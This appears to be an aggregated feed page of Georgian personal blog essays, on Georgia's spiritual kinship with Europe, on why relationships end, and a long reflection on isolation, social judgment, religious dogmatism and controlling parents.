აღწევს კიდეც საწადელს მიზანდასახულობით და ყოველდღიური, მუხლჩაუხრელი შრომით!

   პარადოქსულია, რომ ჩვენი საზოგადოების დიდ ნაწილს არც კი წარმოუდგენია, რაოდენ მყარ სულიერ ტრადიციებზე დგას დღევანდელი ევროპა. ცხადია, მხოლოდ გარეგნულ მხარეს არ ვგულისხმობ, თუმცა თვალში გხვდება ყოველ ნაბიჯზე, სოფლებში თუ გზებზე ხელგაშლილი იესოს, ღვთისმშობლის, მოციქულების ან რომელიმე სხვა წმინდანის ქანდაკება, ისევე, როგორც უძველესი ტაძრების სიუხვე. სულიერებას ევროპა მუდამ აფასებდა და დღესაც აფასებს, მათ შეფასების კრიტერიუმებში ახლაც ფიგურირებს ეკლესიური და ღვთისმოსავი ადამიანების მიმართ პატივისცემა და კეთილგანწყობა. ჩემთვის ეს არის ევროპა, ღვთისნიერი, ლოიალური, მიმტევებელი და კეთილგანწყობილი და მე ის მიყვარს! ევროკავშირი იარსებებს თუ არა, დაიშლება ის თუ გაიზრდება, მიგვიღებენ ამ ორგანიზაციის რიგებში თუ არა, მიუხედავად ყველაფრისა, ევროპა ჩვენი სულიერი ნათესავია, ჩვენ ერთსადაიმავე ფასეულობებზე და კულტურულ ფესვებზე ვართ აღმოცენებული და ევროპელები ჩვენი საამაყო, მისაბაძი ძმები და დები არიან. მე მიყვარს ევროპა და მისი ცხოვრების სტილი, უფრო მეტიც, მიმაჩნია, რომ ევროპის განუყოფელი ნაწილი ვარ!

PoliticsSocietyLifestyleსაქართველო და ევროინტეგრაცია

როცა ურთიერთობა სრულდება

$
0
0
Georgian

ყოველდღე ვიგებ ახალ-ახალ ამბებს დანგრეული ან ვერ შემდგარი ურთიერთობების შესახებ. ჩემს ოჯახში არ ესმით რატომ ან როგორ შეიძლება სულერთი იყოს ჩემთვის მართლა ძალიან სულერთი ამბები. ალბათ იმიტომ, რომ ამაში ახალი არაფერია და რომ ახალი არაფერია, ეს ამბავიც უკვე კარგა ხანია, რაც მოძველდა. ყველაფერი დაძველებული ყოველთვის კარგი არ არის. მათ შორის - არც ურთიერთობები და ერთმანეთის გაძლების აუტანელი სურვილი. აი, თუნდაც ის მომენტი, მოლოდინები რომ გადის და იმის მოლოდინი რჩება, იქნებ ადრე თუ გვიან რაღაცის მოლოდინი გაჩნდეს.

მე ვფიქრობ, ვალდებულების გამო რაღაცის თმენა საშინელებაა და არანაირი კავშირი არ აქვს სიყვარულთან. ადრე თუ გვიან, სხვადასხვა ფორმით მაინც ყველაფერი სრულდება.

ცხოვრებაში, უამრავი ადამიანის წინ, ათიათასჯერ და ხშირად უფრო მეტჯერ, გვიწევს საკუთარ ცხოვრებაზე მონოლოგის წაკითხვა, რაღაცის ახსნა-განმარტება, უფრო მეტის მოყოლა. დგება მომენტები, როცა გარშემომყოფები სვამენ კითხვებს, რომლებსაც პასუხები სჭირდება. ჩვენი სურვილის საწინააღმდეგოდ, ინდივიდები ჩვენს გარშემო იკრიბებიან და დარჩენილი ცხოვრების შემადგენელი, განუყოფელი ნაწილები ხდებიან.  ეს ყველაფერი ისე ხდება, ვერც კი ვიაზრებთ, ვერც კი ვხვდებით, ჩვეულებრივ ყოველდღიურობაში როგორ გადადის.

როცა ურთიერთობა იწყება, არასოდეს არავინ ფიქრობს შესაძლო მომავალზე. ყველაზე რთული, რაც ასეთ დროს არსებობს, პასუხისმგებლობაა. სხვების წარმოდგენა ახალ ურთიერთობასა და მის შემდეგ განვითარებაზე. მე მაინც ვფიქრობ, რომ ვერ შემდგარი ურთიერთობების და ადამიანების ერთადერთი პრობლემა-ქურდობაა. კაცს როცა კლავ- მის სიცოცხლეს იპარავ, ცოლიანი კაცის საყვარელი როცა ხდები - მის ცოლს პარავ ყურადღებას, ბავშვებს - მამას. როცა ცრუობ, სიმართლის გაგების უფლებას ჰპარავ ვიღაცას და ასე შემდეგ.  როცა რაღაცას "იპარავ", გამოდის, რომ გააზრებულად, შენი ნებით ანგრევ ურთიერთობას. და როცა ურთიერთობის დანგრევის მიზეზად სხვას ასახელებ, სუსტი ხარ. მესამე ვერასოდეს გამოჩნდება, თუ ურთიერთობა არ არის დასრულებული. ჯერ ქრება ნდობა, ლტოლვა, გაგება და მერე მოდის სხვა, ახალი. ქალი, რომელსაც არ შეუძლია ამ ყველაფრის აღიარება, არის სუსტი, ძალიან სუსტი.  მე თუ მკითხავთ, ყველაზე კარგად გასახსენებელი მაინც თავისუფლების წუთებია. ის წუთები, როცა გჯეროდა ყველაფრის, მხოლოდ შენი ფიქრებით ცხოვრობდი, შენი სიყვარულით და ალბათ მთავარი მიზეზიც ეს არის. თავისუფლება არ არსებობს თავისუფლების გარეშე, რაც მეტად გიჭირს, მით მეტად წარმოიდგენ კარგ კადრებს, რომლებიც არასოდეს ყოფილან შენთან და სწორედ ამით ხარ ძლიერი. 

CultureSocietyLifestyle

ურთიერთობები და იზოლაციის განცდა.

$
0
0
Georgian

ისევ და ისევ, გამომწყვდეული ამ დაწყევლილ წრედში, რომელიც მუდმივად შეკრულია და ვერაფრით დავაღწიე თავი, პრობლემაც ზუსტად იმაშია, შეიძლება მოვლენებს გაექცე, ადამიანებს გაექცე, მარტოობას, მოვალეობებს, მეზობლებს, ნათესავებს, მაგრამ შენს თავს და შენს ტკივილს ვერასოდეს გაექცევი, შენ ხომ დასჯილი ხარ იყო შენი სამყაროს, შენი ხედვის, შენი აღქმის ცენტრი, იყო ეგოცენტრული, მოწყურებული იყო მზის "შუქს", იმას, რომ გხედავდნენ მაშინ, როდესაც ვერავინ გხედავს, მაშინ როდესაც არავის ადარდებ, მაშინაც კი თუ მუდმივად გიმეორებენ, შენზე ძვირფასი არაფერი გაგვაჩნიაო, მაგრამ რას ვიზამთ, ყველას თავისებურად უყვარს, ზოგს კი უნდა თავს დააჯეროს რომ უყვარს, მაგრამ რეალურად არც კი იცის რა არის სიყვარული, მორალისტობაში ნუ ჩამითვლით, შეიძლება არც მე ვიცი, შეიძლება ეს უბრალო ილუზიაა, რომელსაც ჩვენს თავს ვუგონებთ, შეიძლება სიამოვნების მიღებისადმი ლტოლვაა სხვა ადამიანების ხარჯზე, პიროვნული ნარკოტიკი, რომლის მთელი "კაიფი"-ც სხვისი მხრიდან შენი იდეალური მე-ს პროექციის ვალიდაციაა, რომელსაც ასე ველტვით ყველანი, დიახ, დიახ... სიყვარული ყველაზე დიდი ეგოიზმია, შენ გჭირდება ადამიანი სწორედ იმისათვის, რომ შენ გხდის კარგად, თავს უკეთ გრძნობ მასთან, გახარებს, გაბედნიერებს, გიგებს, სიამოვნებას განიჭებს (ემოციურსა თუ სექსუალურს), გაფასებს, ადარდებ, გიფრთხილდება, ფლობ და გფლობს... მაგრამ საკმარისია რამოდენიმე კომპონენტი ჩამოაშორო და ყველაფერი ქრება, გრჩება მხოლოდ დირე შენს გონებაში, ცარიელი ადგილი, რომელსაც გგონია - იმ კონკრეტული ადამიან(ებ)ის გარდა ვერავინ ამოავსებს ვეღარასოდეს, დირე, რომელსაც კარგი მოგონებები წამლავენ და უფრო აღრმავებენ, ეს კი ტკივილს გიმატებს და გიმატებს, თითქოს ვინმე შენს კოცონზე ასხამდეს ბენზინს, შენ კი მის ჩაქრობას ცდილობდე ამაოდ. რატომღაც დღეს ჩვენთვის ადამიანებისათვის ფასეულობა ის უფრო გახდა ვინ რა აზრს იზიარებს, ვის რა სწამს, ვინ რას სჭამს, ვინ ვის ურტყამს სკამს, ვინ ვის რას ეუბნება, ვინ რა მსოფმხედველობისაა, ვინ ვის "დააჯვა", ვინ ვის აგინა, ვინ ვისზე როგორ იძია შური, ვინ რამდენად შეიძინა აიფონი, ვინ რამდენად რა კომპიუტერი ააწყო, ვის რა აჩუქეს, ვინ სად ერთობოდა, ვინ როგორ გამოიყურება, ვინ რას ფლობს და ა.შ. ჩვენ გავხდით საკუთარი სტანდარტების, რწმენების, მსოფმხედველობების, აზრების, გაგების, სოციალური კლასების, ტექნიკის, ტრანსპორტის, ჩასაცმელის, ფულის, დასვენების, გართობის, ლუდის, მაღალ საზოგადოებრივ წრეში ტრიალის, სხვის ცხვირწინ ხელის ფრიალის, სუფრასთან ჭიქის, ფიალის მონები... ჩვენთვის ფასეულობა ძღომა და "ასფალტი ვჭამოთ"? გახდა, ჩვენთვის მთავარია ჩვენ ვიყოთ კარგად და მოსტ**ნია სხვას “დედის ტრ*კი”. ნაწილი კი საკუთარი ფრიად განვითარებული ინტელექტის მონა გავხდით, გარშემო ვიკრიბავთ მხოლოდ თანამოაზრეებს და თუ ვინმეს შეეშალა, ოდნავ მაინც სხვა აზრმა გაუელვა თავში, მაშინვე თავიდან ვიშორებთ, თითქოს რაიმე ვირუსი იყოს, დეზინფექციას ვუტარებთ ჩვენს თავებს, რომ არ გადმოგვედოს "ბნელი"აზრები, ხშირად კი საკუთარ "ნაბოდვარსაც"კი ვერ ვაყალიბებთ გამართულად... რომ გვკითხონ ყველანი "ჭეშმარიტებას"ვღაღადებთ, "სიმართლის"დამცველები ვართ, მაგრამ იმისათვის, რომ ჩვენი ეგრეთ წოდებული "სიმართლე", რომელიც გრამაფონის, მხარდამჭერთა ჯგუფის, თანამოაზრეების ან ძახილის ნიშნების გარეშე უბრალოდ ნააზრევია, შეიძლება რეალურად ბოდვაც კი იყოს... ნაწილი უფლის სახელით ვსაუბრობთ, თითქოს თავად ვიყოთ ზეცას გამოკიდებული მამა ღმერთი, ყველა ვინც ჩვენს ღმერთს, მის წესრიგს, მორალს, ქორალს, აგიტაცია-პროპაგანდას, სიყვარულს, სიმართლეს, სიდიადეს, არ იზიარებს და აპრიორად, დოგმად არ აქვს მიღებული მისი არსებობა, გენიალურობა, ყოვლისმომცველობა, ბატონობა, მმართველობა, მბრძანებლობა, ნებელობა ან თუნდაც მისი ეგრეთ წოდებული მრისხანების არ ეშინია შეგვიძლია ყველა მიწასთან გავასწოროთ, დავამციროთ, ვაგინოთ, სულელი ვეძახოთ, ამ დროს კი ბიბლიასაც კი არ ვიცნობდეთ საკუთარს კარგად, მაგრამ რადგან გვითხეს, შთაგვაგონეს, გვასწავლეს, დაგვაჯერეს, გვიკარნახეს, ვიფანტაზიორეთ, ვიაზროვნეთ და დავასკვენით, ან უბრალოდ დაგვასკვნევინეს, რომ ესაა ერთადერთი ჭეშმარიტება "ამინ"-ს, "უფალო შეგვიწყალე"-ს, "დიდება უფალს", "ქრისტე აღსდგა"-ს და "ჭეშმარიტად"-ს არ “ვმაზავთ”, სხვა ყველაფერი წყალსაც წაუღია, "ქრისტიანობა ან სივკდილი"...ხან პოლიტიკის გამო ვეკიდებით ერთმანეთს, შეგვიძლია ყელიც კი გამოვჭამოთ იმის მტკიცებაში, თუ რომელი პარტიაა უფრო კარგი, ძლიერი, ჭკვიანი, საქმის გამკეთებელი, წარმატებული და რომელი "გააბრწყინებს იბერიას"თითქოს პოლიტოლოგებად დავბადებულიყავით ყველანი... ხანაც უბრალოდ ერთმანეთის ვიზუალი არ მოგვწონს, იდენტობა, ცხოვრების სტილი, სოციალური, ფიზიკური მდგომარეობა, მიღწევები, ტრადიციები, გრადაციები, სტატიურობა, უპასუხისმგებლობა, უუნარობა, ქმედითუნარიანობა, სიზარმაცე, მიზანდასახულობა, დაბნეულობა, სიყვარულის ობიექტი, ფიზიკური სიჯანსაღე, მოვლილობა, მოუვლელობა, “ტრ*კში პერო გაყრილობა”, გულახდილობა, მლიქვნელობა, წარმატებულობა, წარუმატებლობა, ტკივილი, სიხარული, კარგი განწყობა ან ცუდი, გაგება, განათლების დონე, აქტიური ცხოვრების წესი, პასიური ცხოვრების წესი, ჯანმრთელობის მდგომარეობა, დამოკიდებულებები, ოცნებები, სურვილები, მისწრაფებები, ხასიათი, სისუსტეები ან სიძლიერეები და ა.შ. მოკლედ ყველანაირად ვუპოვით ნაკლს ერთმანეთს, ყველანაირად მოვახერხებთ, რომ შევიძულოთ ერთმანეთი. სულ რომ ანგელოზები ვიყოთ ყველანი ფრთის დიამეტრის ზომვას დავუწყებთ ერთმანეთს. ეს სოციალური ისტერია კი არა და არ გვღლის... არადა უბრალოდ ადამიანები ვართ ყველანი, ყველას გვინდა ვუყვარდეთ, გვაფასებდნენ, ესმოდეთ ჩვენი და მიგვიღონ როგორებიც გვინდა რომ მიგვიღონ, როგორებიც ვართ. სწორედ ეს შინგანი კონფლიქტები გვხდის გარემოსთან ჩაკეტილს, დაბოღმილს, ბრაზიანს, გვასუსტებს, გვანადგურებს, უხეშებს გვხდის, ვიშენებთ გარშემო უჩინარ კედლებს და ამასთან ერთად გვინდა, რომ ჩვენი პიროვნება დაფასებული იყოს, ჩვენი რეალური მეს, სისუსტეების ჩვენების კი გვეშინია, ვაი თუ ვინმემ გადათელვა არ დაგვიპიროს, რადგანაც ყველანი ერთნაირები ვართ, აბსოლუტურად, მეტ-ნაკლებად ერთნაირები, ყველანი ადამიანები ვართ და ალბათ ცოტა უფრო მეტად რომ ვეცადოთ გავუგოთ ერთმანეთს, სხვაც უფრო ბედნიერი იქნებოდა და ისიც უფრო ეცდებოდა სხვისთვის გაეგო, სამწუხარო ის არის, რომ ესე არ ხდება, რადგანაც ჩვენ ყველანი ვლაპარაკობთ, მაგრამ ამავდროულად ყრუები ვართ ერთმანეთისადმი, ჩვენ ყველანი ვწერთ, მაგრამ ერთმანეთის ნაწერის წაკითხვა არ გვინდა, ჩვენ ყველანი მორალს ვკითხულობთ, მაგრამ სხვისი ღირებულებები და სურვილები წყალსაც წაუღია, უფალი გვიყვარს, მაგრამ გვერდზე მყოფი გვეზიზღება, ჩვენ ყველას გვაქვს ჩვენ-ჩვენი ემოციური დაღი დასმული, მაგრამ სხვისი მიშვება არ გვინდა ჩვენამდე - იქნებ ჩვენი შველა შეძლოს. გვეშინია, რომ ერთმანეთს თუ ვენდეთ კატასტროფა გარდაუვალია და ფატალურ შედეგს მოვიმკით, თუმცა ეს შიშები ნამდვილად არ არის ირაციონალური, რადგანაც ყველა ერთმანეთის შეფასება, განსჯა, გაკრიტიკებაზე ვართ გადასულები. მეც თქვენნაირი ვარ, მეც მტკივა, მეც ამ ისტერიის ნაწილი ვარ, მაგრამ მეც თქვენსავით ორპირი ვარ, რადგანაც მეშინია, მეშინია იმის, რომ თუ საკუთარ სისუსტეებს ვინმეს ვაჩვენებ, თუ გავეხსნები, რეალურ მეს დავანახებ, ყველა გადამთელავს... ჩვენი მშობლები ვერ გაიგებ, დამოუკიდებელ ადამიანებს ზრდიან ამ ქვეყანაში, თავისუფალ ადამიანებს, თუ საკუთარ მინი-ასლებს, რომლებზედაც ახდენენ საკუთარი განუხორციელებელი სურვილების ან იდეალების პროექციას, ძერწავენ ბავშვს ყოველივე მახინჯი ფორმით, ტენიან ყველაფერს, რაც თავის დროზე მათ ჩატენეს და ჰგონიათ, რომ ამით კარგს აკეთებენ. მშობლები, რომლებსაც ის უფრო ადარდებთ, რას იტყვის ხალხი - ვიდრე ჩვენი ბედნიერება. მშობლები, რომლებისთვისაც იდეალური შვილი ის შვილია, რომელიც მას სიბერეში მოუვლის და არა ის შვილი, რომელიც წარმატებული პიროვნება და ბედნიერი, თავისუფალი ადამიანი იქნება. მშობლები, რომელთაც გონიათ, რომ საკუთარი ეგოიზმის გამო, იმის გამო, რომ შვილი უნდოდათ და გაგაჩინეს, როდესაც დარწმუნებული ვარ არცერთ ჩვენთაგანს განცხადება არსად არ შეუტანია დაბადების თაობაზე, ჰგონიათ ვალდებულნი არიან და უფლება აქვთ შენი ბედი, ცხოვრება, გარემოებები, სურვილები, განწყობა, მოტივაცია, მიზნები, პრეროგატივები, არჩევანიც კი დაგიდგინონ, შენს მაგივრად იაზროვნონ, იცხოვრონ და თან შენ ამით აუცილებლად ბედნიერი უნდა იყო. მშობლები, რომლებიც "მტრად გაზარდე და მოყვარედ გამოგადგებაო"-თი ხელმძღვანელობენ და უკვირთ, რატომ არ უყვართ საკუთარ შვილებს. მშობლები, რომლებიც ფიქრობენ, რომ თუ მათი შვილი მაძღარია ეს საკმარისია - ის ბედნიერი უნდა იყოს! მშობლები, რომლებიც ჯერ საკუთარ მე-ს გართმევენ შემდეგ კი გეუბნებიან, როდესაც შენი მანიპულირებით დაიღლებიან, რაც გინდა ის ქენი! მშობლები, რომლებიც ისედაც ცუდად ხარ და კიდევ გულს გიხეთქავენ მუქარით, რომ თუ კარგად არ გახდები ფანჯრიდან გადახტება, თავს ჩამოიხრჩობს, მოიკლავს და ინანებ, შემდეგ კი გაგახსენდება მათი ნალაპარაკები! მშობლები, რომლებიც გთხოვენ, რომ იყო პასუხისმგებლობის მქონე, მაშინ როდესაც შენს დახმარებაზე ყოველგვარი პასუხისმგებლობა მოიხსნეს! (ურთიერთობა ხომ ორმხრივია) მოკლედ ძალიან რომ არ გავაგრძელო, მინდა ერთი რამე ვუთხრა ყველას, ჩემს თავსაც და სხვებსაც, ყველანი ადამიანები ვართ, ყველანი განსხვავებულები, უნიკალურები, მაგრამ ამ დროს მაინც ადამიანები! არ შეიძლება უბრალოდ გვიყვარდეს ერთმანეთი? პატივს ვცემდეთ? ვეხმარებოდეთ? გვადარდებდეს? ვეცადოთ გავუგოთ? ვიცი ძალიან ბევრ თემას შევეხე, ბევრიც "ვიბოდიალე"ჩემს ეხლანდელ ემოციურ ფონზე, მაგრამ მინდა, რომ უბრალოდ მორჩეს ეს ყველაფერი... მორალის კითხვა გამომივიდა ვიცი, უბრალოდ რაც მაწუხებს იმაზე ვწერ... მარტო სხვისაგან არ მაწუხებს, მეც ბევრ რამეს ვიკიდებ ფეხებზე, შეიძლება ამ ტექსტმა არც არაფერი შეცვალოს... არ ვიცი, შეიძლება სისულელეც დავწერე, უბრალოდ მინდა, ერთ დღესაც რაიმე სახის ცვლილება მაინც დავინახო, ჩემშიც და სხვაშიც, მე არაფრით ვარ თქვენზე უკეთესი, მერწმუნეთ, უბრალოდ მინდა, რომ ესე აღარ იყოს გარშემო ყველაფერი... რადგანაც ეხლა განსაკუთრებულად მტკივა და ალბათ წერასაც გადავაყოლე გული, მოკლეთ ესე ვიცი ხოლმე, ვწერ, ვწერ, ვწერ და საბოლოოდ ფასეულს არც არაფერს ვამბობ ალბათ, დრო მაინც ხომ გამყავს... ბედნიერება ერთმანეთში უნდა ვეძებოთ და არა საგნებში ან მოვლენებში, “ცხონებაში” ან დანაყრებაში, ფულში ან ძალაუფლებაში, რადგანაც უბედურება - ეს ხომ ჯაჭვური რეაქციის მორევია, თუ ერთი ჩაიყოლა, ის აუცილებლად სხვასაც აუბედურებს... არაფერია ოთხ კედელზე უფრო უსახური, მტკივნეული და მტანჯველი მაშინ, როდესაც გარეთ იცი, არავინ გელოდება, თორემ ალბათ კარიც რომ არ ჰქონდეთ ამ კედლებს, გაანგრევდი!

ReligionSocietyLifestyleურთიერთობასაზოგადოებაიზოლაციასიყვარული
Viewing all 128 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>